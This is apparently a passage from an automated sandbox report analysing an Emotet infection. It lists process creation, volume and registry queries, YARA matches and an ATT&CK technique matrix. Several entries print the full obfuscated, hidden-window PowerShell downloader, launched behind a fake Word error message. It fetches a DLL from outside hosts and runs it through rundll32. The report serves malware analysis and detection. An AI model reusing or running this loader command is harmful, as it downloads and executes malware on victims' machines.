AAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmjhjl\dvgjre.ish',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfafpdt\kkujpl.inf',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Stxynijtatjphar\aakvwlgscnjram.hbh',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oumozqnkirxudf\mcchvdsvabpvx.nrv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ailact\ivkbd.qrm',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Akjjgl\zoljk.jdx',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Liisdspzre\vtsbueurz.syo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uwcxnjiedvybvto\cwmcmgelygpijt.aui',Control_RunDLL	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004C5A cpuid

7_2_10004C5A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,

7_2_10007D46

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000C.00000002.2111593595.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2113623618.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2109883374.0000000000271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2105763694.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2111624405.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2108402593.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2104218731.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2107467849.0000000000471000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2115470379.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2108502450.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2109758118.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2345325449.00000000002B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2107419696.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2345304717.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2105708709.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.6f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting32	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information3	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Scripting32	Security Account Manager	System Information Discovery26	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Security Software Discovery31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter211	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell3	Rc.common	Rc.common	Virtualization/Sandbox Evasion2	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection111	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
